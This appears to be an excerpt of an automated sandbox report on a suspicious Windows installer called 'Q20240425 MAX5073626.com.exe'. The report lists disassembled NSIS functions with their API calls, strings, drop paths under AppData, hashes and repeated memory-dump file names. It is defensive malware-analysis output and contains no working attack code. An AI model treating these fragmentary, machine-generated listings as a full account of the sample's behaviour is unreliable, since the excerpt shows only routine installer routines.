C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest, xrefs: 00405B05, 00405B17, 00405BB6, 00405BBC, 00405BCC
: Completed, xrefs: 00405B3B, 00405B44, 00405B55, 00405BA9, 00405BAF
RichEdit, xrefs: 00405CD8
_Nb, xrefs: 00405C07, 00405C6E

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest$Control Panel\Desktop\ResourceLocale$Farserer248 Setup: Completed$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3077047402
Opcode ID: 8053771ecacbe4d7e620c4896777d19ec47ff4b781c20a256954b63b5aefce54
Instruction ID: 907d6efafd5fae289e3c0aae91a9a1e5f211ac63e7b18c2ecbdfe2db8e46e084
Opcode Fuzzy Hash: 8053771ecacbe4d7e620c4896777d19ec47ff4b781c20a256954b63b5aefce54
Instruction Fuzzy Hash: C46104B0200605BEE620BB65AE46F2B366CEF04358F41453FF941B61E2DF7DAC018A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040154A Relevance: 33.7, APIs: 17, Strings: 2, Instructions: 441
stringtimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 004015F1
Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
SetForegroundWindow.USER32 ref: 00401634
ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente,00000000,000000E6,0040A8E8), ref: 004017A3
MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
GetFullPathNameW.KERNEL32(00000000,00000400,00000000,0040A8E8,00000000,000000E3,0040A8E8,?,?,00000000,00000000), ref: 00401843
GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
lstrcatW.KERNEL32(00000000,00000000), ref: 00401920
CompareFileTime.KERNEL32(-00000014,00000000,#32770,#32770,00000000,00000000,#32770,C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,#32770,40000000,00000001,#32770,00000000), ref: 00401A5A
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401A61
lstrcatW.KERNEL32(#32770,00000000), ref: 00401A82

Strings

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente, xrefs: 00401798, 0040190E
#32770, xrefs: 004018FC, 00401906, 00401913, 00401925, 00401933, 00401968, 0040197C, 004019A2, 004019EA, 00401A7A, 00401A81, 00401A8B, 00401A96

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: File$PathWindow$AttributesNameShowTimelstrcat$ChangeCloseCompareCurrentDirectoryFindForegroundFullMessageMoveNotificationPostQuitSearchShortSleep
String ID: #32770$C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente
API String ID: 2574475933-1841771533
Opcode ID: 43fd908afd629ab3123e27e66c0f7f6d67c4280901ad26f6c9d0b681eabf664a
Instruction ID: 54f580788a1c981ee2aa4d03f04bbd7a59fcfe8367069513e2cd8bad69e9103c
Opcode Fuzzy Hash: 43fd908afd629ab3123e27e66c0f7f6d67c4280901ad26f6c9d0b681eabf664a
Instruction Fuzzy Hash: 47D1E971204301BBC720AF26CD85E2B76A8EF85758F14463FF952B22E1D77CD902966E

Uniqueness

Uniqueness Score: -1.00%

Function 004033C8 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 178
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033DB
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,00000400,?,?,?,?,?), ref: 004033F7

Part of subcall function 00406941: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,80000000,00000003,?,?,?,?,?), ref: 00406945
Part of subcall function 00406941: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 00406965

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,80000000,00000003,?,?,?,?,?), ref: 00403441
GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 0040359B

Strings

C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe, xrefs: 004033E6, 004033F0, 00403404, 00403421
Inst, xrefs: 004034B5
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033CE
C:\Users\user\Desktop, xrefs: 00403422, 00403427, 0040342D
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040361B
Null, xrefs: 004034C9
Error launching installer, xrefs: 00403417
soft, xrefs: 004034BF

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2673803685
Opcode ID: 4d243d38a3ad6339ee8aa80d84cc90877c13bdd790173e94ff372c5f12e29924
Instruction ID: 637332c1018913c6dd7bd02a32c0650212d7fe5c483d10f810555a3d9d10852c
Opcode Fuzzy Hash: 4d243d38a3ad6339ee8aa80d84cc90877c13bdd790173e94ff372c5f12e29924
Instruction Fuzzy Hash: FE51F471600300BFC7219F25DD81B5B7AA8AB88729F10053FF945B72E1CB799E458B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405ECE Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 216
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00405FF5

Part of subcall function 00406B40: lstrcpynW.KERNEL32(?,?,00000400,0040384C,00428520,NSIS Error), ref: 00406B4D

Part of subcall function 00405ECE: SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406067
Part of subcall function 00405ECE: CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040329B,00000000,?), ref: 00406073

GetWindowsDirectoryW.KERNEL32(: Completed,00000400,Completed,?,?,?,?,?,00000000,?,?), ref: 0040600B
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060A0
lstrlenW.KERNEL32(: Completed,Completed,?,?,?,?,?,00000000,?,?), ref: 004060F0

Strings

Completed, xrefs: 00405F29
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405FC0
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040609A
: Completed, xrefs: 00405EF0, 00405FBB, 00405FDF, 00405FF4, 0040600A, 00406033, 00406065, 0040609F, 004060B8, 004060CB, 004060D9, 004060E9, 004060EF, 00406116, 00406132

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrcpynlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 698176107-905382516
Opcode ID: 10e22a83219c9469c943a0011af324ebc33233766f374aa7269788be35432e2f
Instruction ID: 6592cd3e3f1effef240fd6bc508cabf4defa41d1f1dc7b29d78b8892326d4530
Opcode Fuzzy Hash: 10e22a83219c9469c943a0011af324ebc33233766f374aa7269788be35432e2f
Instruction Fuzzy Hash: 2461F4712442119BD720AF29CC80A3B76A4EF88314F16453FF986FB2D1DA3CD9628B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D6F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,?,00000000,?,?), ref: 00405DA1
lstrlenW.KERNEL32(?,Completed,?,00000000,?,?), ref: 00405DB3
lstrcatW.KERNEL32(Completed,?), ref: 00405DCE
SetWindowTextW.USER32(Completed,Completed), ref: 00405DE6
SendMessageW.USER32(?), ref: 00405E0D
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405E28
SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E35

Part of subcall function 00405ECE: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060A0

Strings

Completed, xrefs: 00405D8C, 00405D9A, 00405DA0, 00405DC8, 00405DCD, 00405DD5, 00405DDF

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$TextWindow
String ID: Completed
API String ID: 1759915248-3087654605
Opcode ID: df7e712f3139f74e20298386dab558d5dfe674a56e28af97f2f02655417d6691
Instruction ID: 6ef3c3d0b03056325a7a2600e917b75e8747fbb93f59cfdb966a1896fefd0f42
Opcode Fuzzy Hash: df7e712f3139f74e20298386dab558d5dfe674a56e28af97f2f02655417d6691
Instruction Fuzzy Hash: 0E21F5726016206BC310AF55DD44A9BBBACEF84310F44043FB588B3291C77C9E018AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00403148 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004031B6
GetTickCount.KERNEL32 ref: 00403245
MulDiv.KERNEL32(?,00000064,?), ref: 00403275
wsprintfW.USER32 ref: 00403286

Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F

Strings

IA, xrefs: 004032FE
... %d%%, xrefs: 00403280

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CountTick$FilePointerwsprintf
String ID: ... %d%%$IA
API String ID: 999035486-4091959093
Opcode ID: 17875f6efe9859698fff221a7ea4e726cf93f6784a417477d41227b068560121
Instruction ID: 2447629bb7044e352a44cf446cd93415b8e208792db2fb3d96f352db20133979
Opcode Fuzzy Hash: 17875f6efe9859698fff221a7ea4e726cf93f6784a417477d41227b068560121
Instruction Fuzzy Hash: 2B517D716083419BD7109F2ADD85A2BBBE8AB84345F044A3FB855F32D1DB38DA048B5E

Uniqueness

Uniqueness Score: -1.00%

Function 004061C4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061DB
wsprintfW.USER32 ref: 00406217
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040622B

Strings

\, xrefs: 004061EC
UXTHEME, xrefs: 004061D3
%s%S.dll, xrefs: 00406211

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: a5d5e6927ba214d803f829fdb4940f3dfd8f38c35747a496afdefda45140a5fc
Instruction ID: ea43e37a9a948e64b8baa80a5d9681825b49504011a49ea9ffd1815874cab989
Opcode Fuzzy Hash: a5d5e6927ba214d803f829fdb4940f3dfd8f38c35747a496afdefda45140a5fc
Instruction Fuzzy Hash: 4AF02B71500118A7D710B764DD0DB97366CAF04304F1044BEA647F21D1EB7C8A54CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00406A7C Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406A98
GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403D09,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00406AB3

Strings

a, xrefs: 00406A91
C:\Users\user\AppData\Local\Temp\, xrefs: 00406A81
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A85
n, xrefs: 00406A8A

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
API String ID: 1716503409-3085344383
Opcode ID: 6b72c1919760a7964ca0f7b7f55a239f82b127745a54a5872b51f44c84c39b11
Instruction ID: 4734b79f2842bb542a52457d8b117df1871e87075b0dca9252a62959e0b75850
Opcode Fuzzy Hash: 6b72c1919760a7964ca0f7b7f55a239f82b127745a54a5872b51f44c84c39b11
Instruction Fuzzy Hash: 4DF0BE32700208FBEB109F95ED09BDE7B6AEF91720F11803BE901BA180E6B05A5487A4

Uniqueness

Uniqueness Score: -1.00%

Function 0040141E Relevance: 7.6, APIs: 5, Instructions: 82
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
RegCloseKey.ADVAPI32(?), ref: 004014DC
RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401507

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: a8b72c705e56ca43a24f57969f8c6ebf93f1d97ce7dc5c3ac1486de5659fe1a6
Instruction ID: 77efb6e904de7075251eb55676859da4108275a5579d21884575cfbf3c1c4ffb
Opcode Fuzzy Hash: a8b72c705e56ca43a24f57969f8c6ebf93f1d97ce7dc5c3ac1486de5659fe1a6
Instruction Fuzzy Hash: 0D218231108244BBD7219F51DD04FAB7BADEF99354F01043EF985A11B0D7359A149A6A

Uniqueness

Uniqueness Score: -1.00%

Function 00401DBA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48

Strings

!, xrefs: 00401DF8

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 51a050af1b716c0048941b3f506e03fcf89cda2ee53de88fa27be671efa8297c
Instruction ID: 2f2149dc751229fbb30c604244a48d6d78524570e860c2be8433f4d2860ceba6
Opcode Fuzzy Hash: 51a050af1b716c0048941b3f506e03fcf89cda2ee53de88fa27be671efa8297c
Instruction Fuzzy Hash: 9321F471609301AFE714AF21C846A2FBBE8EF84755F00093FF585A61D0D6B99E05CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040690C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000C), ref: 0040691A
GetProcAddress.KERNEL32(00000000), ref: 00406936

Part of subcall function 004061C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061DB
Part of subcall function 004061C4: wsprintfW.USER32 ref: 00406217
Part of subcall function 004061C4: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040622B

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040690D
UXTHEME, xrefs: 0040690C, 00406919, 00406924

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

